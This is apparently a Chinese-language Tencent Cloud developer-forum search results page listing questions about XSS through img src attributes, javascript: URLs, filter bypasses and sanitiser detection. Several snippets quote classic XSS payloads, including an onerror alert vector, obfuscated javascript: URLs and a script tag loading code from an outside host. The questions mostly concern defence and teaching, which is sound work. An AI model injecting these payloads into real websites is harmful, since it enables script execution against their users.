腾讯云
开发者社区
文档
建议反馈
控制台
登录/注册
首页
学习
活动
专区
圈层
工具
MCP广场
文章/答案/技术大牛
搜索
搜索
关闭
发布
文章
问答
(9999+)
视频
沙龙
3
回答
使用
img
src
属性
中
的
javascript
进行
XSS
攻击
xss
、
security
一些较旧的浏览器很容易受到
XSS
攻击
。IE、FF、Chrome的当前版本都不支持。我很好奇是否有任何浏览器容易受到类似的
攻击
:或 <iframe
src
="somefile.js"
浏览 0
提问于2009-11-26
得票数 18
回答已采纳
1
回答
尽管htmlspecialchars()在做它的工作,
XSS
攻击
仍然有效。
php
、
security
、
xss
php "<SCRIPT
SRC
=http://
xss
.rocks/
xss
.js></SCRIPT>", "<
IMG
SRC
=java\0script:
浏览 7
提问于2022-05-01
得票数 1
回答已采纳
2
回答
基于DOM的
XSS
失败。插入脚本行innerHTML
javascript
、
dom
、
xss
我想向我的学生展示基于DOM的
XSS
攻击
的例子。我认为innerHTML插入恶意脚本就足够了。但令我惊讶的是,当我插入脚本时,它似乎没有被调用。示例如下: example顺便说一下。如果你知道一些好的例子,基于DOM的
XSS
,请张贴在评论。
浏览 2
提问于2016-06-02
得票数 0
回答已采纳
1
回答
图像
src
属性
内
Javascript
的作用域
javascript
、
security
、
xss
我必须为一个与安全有关的大学项目做一个
XSS
攻击
。我想要存储一个
在
源
属性
中
包含恶意代码的图像。但是,我似乎无法访问
src
属性
中
的任何
javascript
对象。以下是我尝试过的一些事情:抛出:未定义引用错误警报。<
img
浏览 3
提问于2014-11-25
得票数 1
回答已采纳
1
回答
<a http://
javascript
:...>href=
html
、
javascript
、
security
、
xss
我想知道href和
src
属性
在
<a>和<
img
>标签上是否总是安全的。
XSS
攻击
,如果它们以http://或https://开头。例如,是否可以以某种方式将
javascript
: ...附加到href和
src
属性
,以执行代码? 不管目标页面是否是一个令人垂涎的站点,或者<
img
src
=...背景:我正在处理带有标记的文本,然后对
浏览 0
提问于2011-03-30
得票数 3
回答已采纳
1
回答
OWASP ESAPI
XSS
攻击
未被检测
javascript
、
java
、
security
、
xss
、
esapi
在
web项目中,我们
使用
ESAPI验证器来
使用
antisamy文件检测
XSS
攻击
。虽然大多数
攻击
都是按预期检测到的,但它无法检测到以下给定输入是否为
XSS
攻击
。<
img
src
=x onerror=alert(1) alt=<
img
sr
浏览 4
提问于2021-02-25
得票数 0
1
回答
如果一个网站过滤掉了与
XSS
相关的术语,它是否仍然存在潜在的脆弱性?
xss
、
javascript
、
html
例如,假设有一个网站,用户输入没有
进行
适当的消毒,但这些过滤器仍然处于活动状态。键入的任何内容都插入到两个div标记之间。输入"<script>alert('
xss
')</script>“将返回"<div>alert('
xss
')</div>",显然不会执行任何
javascript
。投入: <
img
src
=
javascript
浏览 0
提问于2017-05-15
得票数 1
回答已采纳
2
回答
在
C#
中
取消转义客户端数据以防止
XSS
或其他
攻击
javascript
、
c#
、
asp.net
、
security
、
xss
为了防止来自
XSS
或任何其他
攻击
的web应用程序输入,我们希望对来自客户端(浏览器)的所有输入
进行
解码。<
IMG
SRC
=javascript:alert&a
浏览 5
提问于2018-01-12
得票数 0
1
回答
需要解释具体的
XSS
攻击
向量
xss
我的学校网站被黑了因为我的教授被
XSS
-ed了。所以我发现
攻击
者
使用
了这个
XSS
攻击
矢量谁能解释一下这个向量是如何工作的,以及你建议我如何设置我的网站以抵御进一步的
XSS
攻击
。为什
浏览 4
提问于2011-12-25
得票数 0
回答已采纳
2
回答
-
Javascript
和它的上百万种不同的编写方式
c#
、
javascript
、
asp.net-mvc
、
security
它应该删除因为它不在我的白名单
中
,再加上任何onclick、onmouse等等。因为我允许
SRC
属性
,所以我的白名单在这一点上帮不了我。因此,我想到了一个想法,即在
浏览 6
提问于2010-06-19
得票数 8
回答已采纳
4
回答
如果存储
在
Server
中
,哪些HTML标记会被认为是危险的?
javascript
、
asp.net
、
sql-server
、
security
、
database-security
一个
在
一系列场景
中
循环的UDF又如何呢?我很好奇如何最好地处理页面上提到的那些看似鬼鬼祟祟的事情:
攻击
者可以
使用
HTML
属性
(如
src
、lowsrc、样式和href )以及前面的标记注入跨站点脚本。例如,标签的
src
属性
可以是注入源,如下面的示例所示。<
img
src
="
javascript
:alert('hello');"> <<
浏览 10
提问于2015-04-27
得票数 0
回答已采纳
2
回答
没有HTML标签的
XSS
html
、
security
、
xss
如果我的输入不允许<和>字符,那么可以执行
XSS
攻击
吗?
浏览 3
提问于2014-03-14
得票数 5
3
回答
document.vulnerable是做什么的?
javascript
、
xss
我正在更多地研究如何防止
xss
攻击
,其中一种方法就是找到并修复漏洞。我注意到我
在
我记录的很多
攻击
中都看到了document.vulnerable。
浏览 4
提问于2012-05-24
得票数 1
回答已采纳
2
回答
用户提供的内容的呈现是否意味着
xss
漏洞?
web-application
、
xss
同时,如果
使用
脚本标记,脚本似乎不会被执行,而是插入到dom
中
。我该担心吗? 编辑:由于我修复了漏洞,这是为任何人感兴趣的网站。wezelchat.herokuapp.com和github上的回购。
浏览 0
提问于2018-10-29
得票数 2
回答已采纳
2
回答
当在有效负载
中
添加http时,
xss
web-application
、
xss
如果一个字段不是santized(除了<,>),它所做的只是在有效负载
中
添加http并反映输出,那么是否可以
在
客户端执行脚本?<a href = "http://../
javascript
:alert(1)" target ="_blank">产出: <a href = "http
浏览 0
提问于2015-10-11
得票数 2
回答已采纳
2
回答
addslashes()可以安全地阻止HTML
属性
中
的
XSS
吗?
php
、
javascript
、
security
、
xss
它
使用
addslashes()来阻止HTTML
属性
上的
XSS
。<?>编辑:多亏了Quen
浏览 0
提问于2011-12-02
得票数 5
回答已采纳
2
回答
如何在HTML字符串中转义
JavaScript
,同时保持HTML未转义?
java
、
javascript
、
security
、
escaping
、
xss
在
某些方面,有一个基于
JavaScript
的WSIWYG / RichText编辑器。它过滤了一些
JavaScript
,但是
使用
HTML来格式化它的内容。不幸的是,它没有过滤所有的
JavaScript
。我能够用事件处理程序来证明
XSS
攻击
。我认为
JavaScript
客户端对
JavaScript
的过滤根本不安全,因为
在
客户端可以对其
进行
操作。因此,我想在服务器端过滤或转义
JavaSc
浏览 6
提问于2011-06-01
得票数 2
回答已采纳
2
回答
当他们说React受
XSS
保护时,这是什么意思?
reactjs
、
security
、
xss
我
在
React教程上读到了这篇文章。这是什么意思? 如果React是安全的,
XSS
攻击
是如何工作的?如何实现这种安全性?
浏览 44
提问于2015-11-11
得票数 157
1
回答
为什么<audio>源需要CSP?
javascript
、
html
、
security
、
xss
、
content-security-policy
但是,由于主要开发人员所做的CSP限制,由于default-
src
: 'none'的原因,不允许我
使用
blobs作为音频源谢谢!
浏览 3
提问于2022-09-04
得票数 0
4
回答
跨站点脚本
攻击
的一个简单示例
xss
有人可以向我展示
在
我的浏览器上有效的
攻击
吗?互联网上有没有这样的例子呢?我还没在网上找到这个呢。 示例越简单越好。
浏览 1
提问于2012-03-06
得票数 35
回答已采纳
点击加载更多
相关
资讯
WEB前端安全自查和加固
如果你还不防范用户输入,你的网站可能就要玩完了
浅析前端安全之 XSS
Web 安全漏洞之 XSS 攻击
工具集-XSS Payload
热门
标签
更多标签
云服务器
对象存储
ICP备案
云点播
智聆口语评测
活动推荐
运营活动
广告
关闭
领券